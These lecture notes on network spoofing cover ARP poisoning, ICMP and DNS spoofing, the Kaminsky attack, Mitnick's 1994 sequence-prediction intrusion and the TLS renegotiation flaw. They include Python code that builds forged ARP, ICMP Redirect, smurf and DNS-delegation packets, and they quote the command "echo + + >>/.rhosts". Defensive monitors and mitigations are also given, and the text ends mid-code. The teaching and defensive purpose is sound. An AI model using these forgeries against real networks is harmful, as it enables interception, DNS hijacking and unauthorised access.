CA645: Spoofing (Gavin O'Gorman)
Sniffing
On a hub LAN, packet sniffing is trivial, as packets are broadcast to all stations. The network card is put into promiscuous mode and a packet sniffer is used, for example Wireshark or tcpdump. Anything transmitted in plaintext is trivial to observe. Complete objects can be extracted from observed streams: images, executables, anything transmitted over the network.

Figure: tcpdump output of a wget request to google.com.
But we might want to see the actual payload. tcpdump has options for that; use the man page to find them.
Analysing a packet dump with tcpdump can be difficult. If possible, use Wireshark (formerly Ethereal).
Switched Networks
Switched networks do not send all traffic to all ports, so sniffing is not possible. Or is it? By exploiting the Address Resolution Protocol, it is possible to sniff all, or just some, traffic on a switched network. ARP caches can be poisoned: send the wrong data to other hosts on the network.

ARP Poisoning
We have a LAN with three machines connected via a switch. The machines have MAC addresses A, B and C and IP addresses 1, 2 and 3. A is the attacker; B and C are innocent parties. A wishes to see the communications between B and C.

A creates an Ethernet frame containing an ARP REQUEST for IP address 3. The ARP REQUEST carries A as the source MAC address with a false associated IP of 2. This ARP REQUEST is broadcast to the network.

C sees the ARP REQUEST and responds with its Ethernet address. At the same time, C updates its ARP cache with the source IP and MAC from the spoofed packet. C's cache now contains 2:A.

A performs the same trick, this time sending the ARP REQUEST for IP address 2 (B) and using A:3 as the source MAC and IP.

B sees the ARP REQUEST, replies, and updates its cache with the false information. B now has a cache where IP address 3 points to MAC address A, and C has a cache where IP address 2 points to MAC address A. A has a cache with the correct mappings.

B now wishes to connect to IP address 3. B sees 3:A in its cache, so it sends the Ethernet frame encapsulating the IP packet to A. Having observed the contents, A can forward the packet on to C, modify the contents, delay it or delete it. Any response from C is likewise sent to A.
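The two poisoning requests above, as an added example that is not part of the lecture: it packs the Ethernet and ARP headers with struct, then models B and C as stations following the RFC 826 receive rule (record the sender's IP-to-MAC pair whenever the request is for our own address, then reply). The MAC and IP values are made up for the demo (192.168.0.0/24, locally administered MACs) and nothing is sent on a real network.

```python
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac(text):
    """'02:00:00:00:00:0a' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip4(text):
    """'192.168.0.1' -> 4 raw bytes."""
    return bytes(int(octet) for octet in text.split("."))


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=BROADCAST):
    """Ethernet II frame carrying a 28-byte ARP packet (RFC 826 layout).
    The sender fields are whatever the builder writes in them; nothing checks
    that they belong to the machine transmitting the frame."""
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, op,            # Ethernet, IPv4, hlen, plen, opcode
                      sender_mac, sender_ip, target_mac, target_ip)
    eth = struct.pack("!6s6sH", dst_mac, sender_mac, ETHERTYPE_ARP)
    return eth + arp


def parse_arp_frame(frame):
    _, _, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    fields = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return dict(zip(("op", "sha", "spa", "tha", "tpa"), fields[4:]))


class Station:
    """Minimal host following the RFC 826 receive algorithm: if the target
    protocol address is ours, record the sender's IP->MAC pair, then answer
    if it was a request. The pair is recorded unverified, before any reply,
    which is exactly what poisoning exploits."""

    def __init__(self, mac_addr, ip_addr):
        self.mac, self.ip = mac_addr, ip_addr
        self.arp_cache = {}            # ip bytes -> mac bytes

    def receive(self, frame):
        arp = parse_arp_frame(frame)
        if arp["tpa"] != self.ip:
            return None
        self.arp_cache[arp["spa"]] = arp["sha"]
        if arp["op"] == ARP_REQUEST:
            return build_arp_frame(ARP_REPLY, self.mac, self.ip,
                                   arp["sha"], arp["spa"], dst_mac=arp["sha"])
        return None

    def next_hop_mac(self, dst_ip):
        return self.arp_cache.get(dst_ip)


def run_poisoning():
    """Replays the lecture's scenario: A (attacker) poisons B and C so that
    frames between them are delivered to A's MAC. Returns the MAC each
    victim will now use for the other's IP."""
    a = Station(mac("02:00:00:00:00:0a"), ip4("192.168.0.1"))   # attacker, IP 1
    b = Station(mac("02:00:00:00:00:0b"), ip4("192.168.0.2"))   # IP 2
    c = Station(mac("02:00:00:00:00:0c"), ip4("192.168.0.3"))   # IP 3

    # Request for IP 3 (C) claiming to be IP 2 (B) at A's MAC, and the mirror image for B.
    poison_c = build_arp_frame(ARP_REQUEST, a.mac, b.ip, b"\x00" * 6, c.ip)
    poison_b = build_arp_frame(ARP_REQUEST, a.mac, c.ip, b"\x00" * 6, b.ip)

    replies_seen_by_a = []
    for frame in (poison_c, poison_b):          # broadcast: every station processes both
        for station in (a, b, c):
            reply = station.receive(frame)
            if reply is not None:               # unicast to the sender MAC, i.e. to A
                replies_seen_by_a.append(reply)

    return {"B->IP3": mac_str(b.next_hop_mac(c.ip)),
            "C->IP2": mac_str(c.next_hop_mac(b.ip)),
            "replies_to_A": len(replies_seen_by_a)}
```

Cache entries time out, so a real attacker re-sends the spoofed frames every few seconds to keep both victims poisoned; forwarding must also be enabled on A, otherwise the result is the denial of service described on the next slide rather than a man in the middle.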
Other ARP Related Attacks
Denial of Service: send a false, non-existent MAC address for the local IP gateway to a target machine on the network. When this machine attempts to connect to IP addresses not on the LAN, the frames will be sent to nowhere. The machine has lost external access.

Overloading a switch: the brute force approach to sniffing traffic on a switch. Send an excess of ARP updates (frames with many different source MAC addresses) to the switch. The switch's address table memory fills up and the switch may drop down into basic hub mode, transmitting to all nodes.

This is not an out of date attack. ARP poisoning, although quite old, is still a serious issue. Wireless networks are a major victim. Viruses and trojans can utilise ARP poisoning/spoofing on LANs. Assume you have a secure workstation on a LAN. Another machine on the LAN is not so secure and ends up with a virus on it. The compromised machine performs ARP poisoning, implementing a Man in the Middle attack. All connections from the secure machine are now routed via the insecure one: HTTP, SMTP, POP3 etc. The attacker inserts malicious code into HTTP downloads and so installs a virus on the secure machine.

Prevention/Monitoring
How to prevent ARP spoofing/poisoning? On a small network, you could set up static IP:MAC mappings and disable updates. Not too feasible for a large number of machines though. If you have a managed switch, you may be able to restrict each port to a single MAC address. Note that MAC addresses can be changed easily: authorization based solely on MAC address is a BAD idea. You can monitor for suspicious ARP activity using ARPWatch. ARPWatch builds a database of MAC:IP mappings and notifies when there are changes.
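An ARPWatch-style monitor, added here as an illustration and not taken from ARPWatch's own source: it keeps the last MAC seen for every IP plus every MAC the IP has ever been paired with, and raises the three events arpwatch is known for (new station, changed ethernet address, flip flop). The sample events are constructed to replay the poisoning above, with the real owner of the IP answering afterwards.

```python
from collections import namedtuple

# One (sender IP, sender MAC) pair observed in an ARP packet on the wire.
ArpEvent = namedtuple("ArpEvent", "time ip mac")


class ArpWatch:
    """Tracks the MAC most recently seen for each IP and every MAC the IP has
    ever been paired with, and reports the events arpwatch reports."""

    def __init__(self):
        self.current = {}   # ip -> mac most recently seen
        self.history = {}   # ip -> set of every mac ever seen for it

    def observe(self, ev):
        seen = self.history.setdefault(ev.ip, set())
        if ev.ip not in self.current:
            self.current[ev.ip] = ev.mac
            seen.add(ev.mac)
            return f"{ev.time} new station {ev.ip} {ev.mac}"
        old = self.current[ev.ip]
        if old == ev.mac:
            return None                       # same pair as before: nothing to report
        self.current[ev.ip] = ev.mac
        # A change back to a MAC seen earlier is a "flip flop": the classic
        # signature of a poisoner and the real owner both answering for one IP.
        kind = "flip flop" if ev.mac in seen else "changed ethernet address"
        seen.add(ev.mac)
        return f"{ev.time} {kind} {ev.ip} {ev.mac} (was {old})"


def scan(events):
    """Feed a sequence of ArpEvents through one watcher; return the alerts raised."""
    watch = ArpWatch()
    alerts = []
    for ev in events:
        msg = watch.observe(ev)
        if msg:
            alerts.append(msg)
    return alerts


# Constructed sample: a quiet LAN, then the attacker (MAC ...:0a) claims IP .3,
# then the real owner of .3 (MAC ...:0c) speaks again.
SAMPLE = [
    ArpEvent("10:00:01", "192.168.0.2", "02:00:00:00:00:0b"),
    ArpEvent("10:00:02", "192.168.0.3", "02:00:00:00:00:0c"),
    ArpEvent("10:00:03", "192.168.0.2", "02:00:00:00:00:0b"),
    ArpEvent("10:00:10", "192.168.0.3", "02:00:00:00:00:0a"),   # poisoning
    ArpEvent("10:00:11", "192.168.0.3", "02:00:00:00:00:0c"),   # real host answers
]
```

A changed address on its own is not proof of an attack (DHCP reassigning a lease or a replaced network card produces the same event), but a flip flop between two MACs within seconds is worth investigating.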
IP Spoofing
IP packets can be created manually and contain whatever their designer wishes. They are programmed using raw sockets, root only under Unix. The IP source address can be set to anything. IP spoofing attacks are particularly dangerous when hosts use an IP address as authentication. Older Unix utilities, rsh and rlogin, allowed access based on the source IP address; replace them with SSH. IP spoofing attacks work with ICMP and UDP. TCP has sequence numbers which hinder the attack, but as we will see they are not infallible (discussed later).

Basic ICMP attacks can be implemented using spoofing. A basic attack may be to send a stream of ping packets to a host in an attempt to waste bandwidth or processing time, overloading it. The attacker can spoof the source IP address so as not to be identified. This is limited to the bandwidth the attacker has available. A more effective attack is to broadcast a ping to the entire network, with the source of the ping set to the victim. Any machine on the network configured to respond to ICMP broadcast pings will reply, potentially overwhelming the victim. A smurf attack is a Denial of Service attack where a false request generates a storm of responses to a target address. There are ICMP implementations of this attack.

ICMP Spoofing: Ping attack
The attacker sends a single ping (ICMP ECHO request) packet to the broadcast address with the source set to the victim's address. The machines on the network respond with ICMP ECHO responses to the victim.
ICMP Spoofing: Redirect attack
The ICMP Redirect message is used by gateways to advise of a better route. A Redirect message must be sent in relation to an existing connection, however. That is, a client must have sent something for the Redirect to be sent.

Below we have two gateways, a primary and a secondary. The secondary gateway has been compromised by an attacker. There is a target machine the attacker wishes to access and a trusted host. The target machine allows the trusted host to connect to it.

The attacker sends a spoofed TCP SYN packet to the target machine. The spoofed source is the trusted host. The target machine responds with the SYN/ACK packet, routed through the primary gateway. The attacker now sends an ICMP Redirect packet to the target machine. The source is set as the primary gateway, and the Redirect message tells the target to use the secondary gateway in future. The target machine updates its routing table to reflect this.
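Both spoofed ICMP packets from these slides (the smurf echo request to the broadcast address, and the forged Redirect) as one added example; it is not code from the lecture. The IPv4 and ICMP headers are packed by hand with the RFC 1071 checksum, the addresses are made-up values from the 192.0.2.0/24 documentation range, and nothing is transmitted: the point is that the source address is just a field the builder fills in.

```python
import struct


def checksum(data):
    """RFC 1071 ones-complement sum, used by both the IPv4 and ICMP headers.
    Over a header that already carries a correct checksum it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip4(text):
    return bytes(int(o) for o in text.split("."))


def dotted(raw):
    return ".".join(str(b) for b in raw)


def ipv4_header(src, dst, payload_len, proto=1, ttl=64):
    """20-byte IPv4 header (proto 1 = ICMP, 6 = TCP). The source field is
    whatever the caller passes; nothing ties it to the real sender."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0,
                      ttl, proto, 0, ip4(src), ip4(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def icmp(icmp_type, code, rest, payload=b""):
    """type, code, checksum, 4 bytes of type-specific data, optional payload."""
    body = struct.pack("!BB", icmp_type, code) + b"\x00\x00" + rest + payload
    return body[:2] + struct.pack("!H", checksum(body)) + body[4:]


def smurf_probe(victim, broadcast, ident=0x1234, seq=1, payload=b"A" * 56):
    """Echo request (type 8) to the broadcast address, victim as source:
    every responder's echo reply goes to the victim, not to us."""
    echo = icmp(8, 0, struct.pack("!HH", ident, seq), payload)
    return ipv4_header(victim, broadcast, len(echo)) + echo


def forged_redirect(claimed_gateway, target, new_gateway, triggering_datagram):
    """ICMP Redirect (type 5, code 1 = redirect for host) claiming to come from
    the primary gateway and naming the attacker's gateway instead. The body
    quotes the IP header plus 8 bytes of the datagram being 'redirected',
    which is why the attacker first provokes the target into sending one."""
    body = icmp(5, 1, ip4(new_gateway), triggering_datagram[:28])
    return ipv4_header(claimed_gateway, target, len(body)) + body


def parse(packet):
    """(src, dst, icmp type, code, both checksums valid) for a packet built above."""
    ihl = (packet[0] & 0x0F) * 4
    fields = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    body = packet[ihl:]
    ok = checksum(packet[:ihl]) == 0 and checksum(body) == 0
    return dotted(fields[8]), dotted(fields[9]), body[0], body[1], ok


def build_examples():
    """Constructed scenario: target 192.0.2.10, trusted host .20, primary
    gateway .1, compromised secondary gateway .2, broadcast .255."""
    # The SYN/ACK the target sent to the trusted host: IP header + 8 bytes of TCP.
    trigger = ipv4_header("192.0.2.10", "192.0.2.20", 8, proto=6) + b"\x02\x01\x03\xff\x00\x00\x00\x00"
    return {
        "smurf": smurf_probe("192.0.2.10", "192.0.2.255"),
        "redirect": forged_redirect("192.0.2.1", "192.0.2.10", "192.0.2.2", trigger),
        "trigger": trigger,
    }
```

Modern hosts mitigate both: directed-broadcast forwarding is normally disabled on routers (RFC 2644), and `net.ipv4.conf.all.accept_redirects=0` makes a Linux target ignore Redirects altogether.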
ICMP Spoofing
ICMP attacks can also be used for additional Denial of Service attacks with the Destination Unreachable or Time Exceeded messages. However, RFC 1122 advises that most ICMP error messages be treated as advisory rather than mandatory. It is also the case that for LAN attacks, ARP poisoning can achieve the same results with less effort. In practice, ICMP attacks are not very common.
UDP Spoofing
Applications using UDP may also be vulnerable to IP spoofing. DNS is one example. DNS requests and responses of less than 512 bytes use UDP. A request has a 16-bit random ID number; the response from the server contains the same ID number as identification. The outgoing packet also has a UDP source port.

UDP Spoofing: DNS
An attacker wants to replace the IP for www.bbc.co.uk with that of a machine they control. The solution: when the ISP's DNS server issues a request to the authoritative server, spoof a response from that server with the attacker's chosen IP.

It's not quite that straightforward, however, when the attacker is not on the same LAN. The attacker cannot see the request, so does not know the ID, the source UDP port, or even the time the request is issued. The solution for the attacker is to issue the request for the domain themselves. To discover the source port, issue some requests for domains the attacker controls and observe what source port the server uses; the server may use the same port consistently. To discover the ID, the attacker uses a brute force approach, sending a large number of false responses with different IDs. With the Birthday Paradox (many requests outstanding at once, each matched by forged responses), this evaluates to a 0.96 chance of success with 650 requests/responses.

Kaminsky Attack
Dan Kaminsky found a more dangerous version of this attack. The attack is almost identical; however, it allows an attacker to take over a complete domain, not just a single record.
1. The attacker makes a request for a random/unused subdomain in the particular domain he wishes to control (a fresh name each attempt, so a cached answer never blocks a retry).
2. The attacker then sends the forged response packets as in the previous attack, brute forcing the ID.
3. However, instead of responding with the DNS record, the attacker sends a response delegating the domain to another nameserver.
4. The attacker controls this nameserver and so now responds to all requests for the compromised domain: MX, NS, etc.!
With a sufficient amount of data, this attack can succeed in approximately 10 seconds. How to solve? Randomise the UDP source port as well. Potentially other solutions like DNSSEC.
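An added example for the two DNS slides above (not from the lecture): the birthday calculation behind the "0.96 with 650" figure, and a Kaminsky-style forged response that answers a query for an unused name with a delegation of the whole zone plus glue. The names (example.com, ns.attacker.example) and the 192.0.2.1 glue address are invented; the message is built and parsed locally, without compression pointers, and never sent.

```python
import struct


def birthday_success(n, space=1 << 16):
    """Probability that n random IDs drawn from `space` contain at least one
    collision: the birthday-paradox figure the slides quote (n = 650 gives
    about 0.96 for 16-bit IDs)."""
    p_no_collision = 1.0
    for i in range(n):
        p_no_collision *= 1.0 - i / space
    return 1.0 - p_no_collision


def single_guess_success(n, space=1 << 16):
    """Naive attack: n forged responses aimed at one outstanding query."""
    return min(1.0, n / space)


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(msg, off):
    labels = []
    while msg[off]:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1


def rr(name, rtype, ttl, rdata):
    """Resource record: name, type, class IN, ttl, rdlength, rdata."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def forged_delegation(txid, qname, zone, ns_name, ns_ip, ttl=86400):
    """Kaminsky-style response: no answer section, but an NS record for the
    whole zone in the authority section and attacker-chosen glue for that NS.
    txid is one guess; the real attack sends one of these per candidate ID."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 1, 1)   # flags: QR=1, AA=1
    question = encode_name(qname) + struct.pack("!HH", 1, 1)     # type A, class IN
    authority = rr(zone, 2, ttl, encode_name(ns_name))           # NS
    glue = rr(ns_name, 1, ttl, bytes(int(o) for o in ns_ip.split(".")))   # A
    return header + question + authority + glue


def parse_response(msg):
    """(txid, qname, [(name, type, value), ...]); names must be uncompressed,
    as forged_delegation writes them."""
    txid, _flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                   # skip qtype, qclass
    records = []
    for _ in range(an + ns + ar):
        name, off = decode_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 2:
            value, _ = decode_name(msg, off)
        else:
            value = ".".join(str(b) for b in msg[off:off + rdlen])
        off += rdlen
        records.append((name, rtype, value))
    return txid, qname, records
```

The same 650 packets against a 32-bit space (16-bit ID plus a randomised 16-bit source port) give a success probability below one in ten thousand, which is why source port randomisation was the emergency fix; a resolver that also refuses glue outside the queried zone (bailiwick checking) would not accept the `ns.attacker.example` record in the additional section at all.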
Preventing IP Spoofing
One of the most important issues is to not accept packets claiming to be from inside your network which originate from outside the network. ISPs should not route packets with source addresses not on their network, but they often do. Unicast Reverse Path Forwarding: don't route non-existent IPs, and ensure that packets entering the router have a valid path back to that router. More on this in Distributed Denial of Service attacks.
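A strict/loose unicast RPF check over a small routing table, added as an example (not lecture material and not any vendor's implementation). The table and interface names are constructed: one customer LAN, one remote prefix with a specific route, and a default route upstream.

```python
import ipaddress

# Constructed forwarding table for a small edge router.
ROUTES = [(ipaddress.ip_network(p), iface) for p, iface in (
    ("192.0.2.0/24", "lan"),          # our own network
    ("203.0.113.0/24", "upstream"),   # a remote network with a specific route
    ("0.0.0.0/0", "upstream"),        # default route
)]


def reverse_path(src):
    """Longest-prefix match on the SOURCE address: the (prefix, interface)
    the router would use to send a packet back to it, or None."""
    addr = ipaddress.ip_address(src)
    matches = [(net, iface) for net, iface in ROUTES if addr in net]
    return max(matches, key=lambda m: m[0].prefixlen) if matches else None


def urpf_strict(src, ingress):
    """Strict uRPF: accept only if the best route back to src leaves on the
    interface the packet arrived on. A 192.0.2.x source arriving on 'upstream'
    fails, which is the slide's 'inside address from outside' case."""
    match = reverse_path(src)
    return match is not None and match[1] == ingress


def urpf_loose(src, allow_default=False):
    """Loose uRPF: accept if any route to src exists. A match on the default
    route only counts when allow_default is set, so sources with no specific
    route (unallocated or bogus space) are dropped by default."""
    match = reverse_path(src)
    return match is not None and (match[0].prefixlen > 0 or allow_default)


def filter_packets(packets):
    """packets: iterable of (src_ip, ingress_interface); strict verdict per packet."""
    return [(src, ingress, "accept" if urpf_strict(src, ingress) else "drop")
            for src, ingress in packets]
```

Strict mode belongs on interfaces where routing is symmetric (customer and stub links); on a multi-homed upstream link it drops legitimate traffic whose return path goes elsewhere, which is why loose mode exists, and why a default route on that link makes strict mode accept anything that arrives there.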
TCP Stream Spoofing
Moving up to TCP, a new factor is introduced: the sequence numbers, negotiated during the TCP/IP handshake. These sequence numbers make it difficult for an attacker to spoof a TCP/IP stream when they cannot observe them. However, TCP/IP implementations differ in how they generate the ISNs. Some implementations can be predictable!
Case Study!
An interesting case study is detailed at http://www.gulker.com/ra/hack/tsattack.html. Two o'clock in the afternoon, Christmas Day, 1994: Kevin Mitnick breaks into Tsutomu Shimomura's network. Mitnick used TCP/IP spoofing to access the network. He left mocking voicemails for Shimomura. Shimomura is displeased and helps the FBI to track down and ultimately arrest Mitnick. Mitnick spent 5 years in jail.

Shimomura's network consists of three machines: server, x-terminal and target. The x-terminal computer trusts the server machine. That is, x-terminal is configured to allow connections from server.

Mitnick begins with a reconnaissance of the network. His machine is toad.com. He is listing the information offered by the target, server and x-terminal machines.

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server
14:10:50 toad.com# finger -l root@server
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal

Several minutes later, the server machine is bombarded with SYN packets from a non-existent IP address. The connection queue is filled and the server machine is unable to respond to any requests.

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096

20 connection attempts are made from apollo.it.luc.edu to x-terminal.

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997

If we look at the Initial Sequence Numbers being sent from x-terminal, we see something interesting: each successive ISN is exactly 128,000 higher than the previous one (2021824000, 2021952000, 2022080000, ...), so the ISN x-terminal will use for the next connection can be predicted.

Now that the ISN sequence is known, it is possible for Mitnick to establish a fake connection to the x-terminal machine from the server machine. A spoofed SYN packet is sent to x-terminal from server. x-terminal responds with a SYN/ACK packet to server. But remember! Server was overloaded at the start, so it is unable to respond with a RST packet. A spoofed ACK packet is then sent to x-terminal, with the guessed ISN. A connection has been opened. A spoofed data packet is then sent to x-terminal. Its contents are:

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"
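The ISN analysis Mitnick relied on, as an added example that is not from the lecture or from Shimomura's write-up: it parses the x-terminal SYN/ACK lines reproduced above (copied into a string constant here), checks that consecutive ISNs differ by a constant, predicts the next one, and shows which sequence and acknowledgement numbers the blind spoofer must put in the ACK and data packets. The attacker's own sequence number is an arbitrary constant.

```python
import re

# Lines copied from the capture shown in the case study (x-terminal's SYN/ACKs
# plus one of apollo's SYN and RST lines, which the parser must skip).
CAPTURE = """\
14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997
"""

# A tcpdump SYN/ACK line: timestamp, source, '>', destination, 'S isn:isn(0) ack n'.
SYNACK = re.compile(r"^\S+ (\S+) > (\S+): S (\d+):\d+\(0\) ack \d+")

MASK32 = 0xFFFFFFFF


def extract_isns(capture, server="x-terminal.shell"):
    """ISNs chosen by `server`, in capture order; other lines are ignored."""
    return [int(m.group(3)) for line in capture.splitlines()
            if (m := SYNACK.match(line)) and m.group(1) == server]


def isn_step(isns):
    """The constant per-connection increment (mod 2^32), or None if the
    observed ISNs do not step evenly."""
    deltas = {(b - a) & MASK32 for a, b in zip(isns, isns[1:])}
    return deltas.pop() if len(deltas) == 1 else None


def predict_next_isn(isns):
    step = isn_step(isns)
    return None if step is None else (isns[-1] + step) & MASK32


def spoofed_handshake(predicted_isn, attacker_seq=0x5A5A5A5A):
    """Numbers the blind spoofer puts on the wire. The SYN/ACK from the
    server is never seen, so the ACK (and the data that follows) must carry
    ack = predicted ISN + 1; anything else is dropped or reset."""
    ack = (predicted_isn + 1) & MASK32
    return {
        "syn":  {"seq": attacker_seq},
        "ack":  {"seq": attacker_seq + 1, "ack": ack},
        "data": {"seq": attacker_seq + 1, "ack": ack},
    }
```

Because the increment is per connection rather than per unit of time, the attacker's own probe connections are what advance the counter, which is why the probes are sent back-to-back and reset immediately: the next ISN is then the last observed one plus 128,000, give or take any connection opened by someone else in between.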
RST packets are sent to the server machine to clear the backlog and allow it to function normally. The spoofed connection is closed. Mitnick can now connect to the x-terminal machine from any other machine, as any user; there is no need for more stream spoofing. An existing connection from the x-terminal machine to the target machine is hijacked, and Mitnick has achieved his goal.
That was 1994!
That was a long time ago. Vendors have improved their TCP/IP stacks to use properly random ISNs. Or have they? CERT advisory CA-2001-09 demonstrates that Alcatel equipment, at the time, didn't use random ISNs but increased the ISN by 64,000 every millisecond. In 2004, Watson discovered that RST packets were honoured if the sequence number was anywhere within the receive window. Window sizes are 32k or more, so fewer than 2^17 guesses are needed to generate a correct packet.
SSL/TLS Re-negotiation flaw
An interesting flaw was discovered in the TLS protocol recently, around November 2009. The flaw allows a MITM attacker to prepend a conversation with a small amount of data. The innocent user attempts to connect to a target server, secured by TLS. The attacker has put himself or herself in between the client and the server, thus receiving the initial handshake values from the client. The attacker then makes its own connection to the TLS server. It sends a small amount of data and then requests a re-negotiation, passing on the original client's handshake parameters. The server and client establish a secure, confidential connection which the attacker cannot compromise. However, as part of the re-negotiation protocol, the server takes the initial piece of data from the attacker and prefixes it to the data sent by the client.

A practical proof of concept implementation of this attack was used to compromise Twitter accounts. For Twitter, a status update can be done through a simple HTTP PUT to "twitter.com/statuses/update.xml". The attacker sends a status update request, authenticated with the attacker's own username/password, but with no terminating CRLF. The client's request is then appended to it: the client's initial GET header line is partially ignored, while the further data, cookies for example, are included. When the client submits its own status update, its request includes the client's username/password. The full HTTP header, credentials included, is written to the attacker's status.
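The effect of the renegotiation splice at the HTTP layer, as an added example (not the original proof of concept, and TLS itself is not modelled): the attacker's unterminated request is concatenated with the client's request, which is exactly the byte stream the server application reads after the flawed renegotiation. The credentials and the `status=` form field are made up; the example uses POST where the slide says PUT, and the method makes no difference to the splice.

```python
def parse_http_request(stream):
    """Minimal HTTP/1.x request parser: (request line, headers, body).
    Like a real server it reads exactly Content-Length bytes of body."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    length = int(headers.get("content-length", "0"))
    return request_line, headers, rest[:length]


def attacker_prefix(attacker_auth, body_len):
    """What the attacker sends before requesting renegotiation: a complete
    header block authenticated as the attacker, and a body that is
    deliberately left unfinished so the client's bytes complete it."""
    return (b"POST /statuses/update.xml HTTP/1.1\r\n"
            b"Host: twitter.com\r\n"
            b"Authorization: Basic " + attacker_auth + b"\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(body_len).encode() + b"\r\n"
            b"\r\n"
            b"status=")


# Constructed: what the victim's client sends over the renegotiated connection.
VICTIM_REQUEST = (b"POST /statuses/update.xml HTTP/1.1\r\n"
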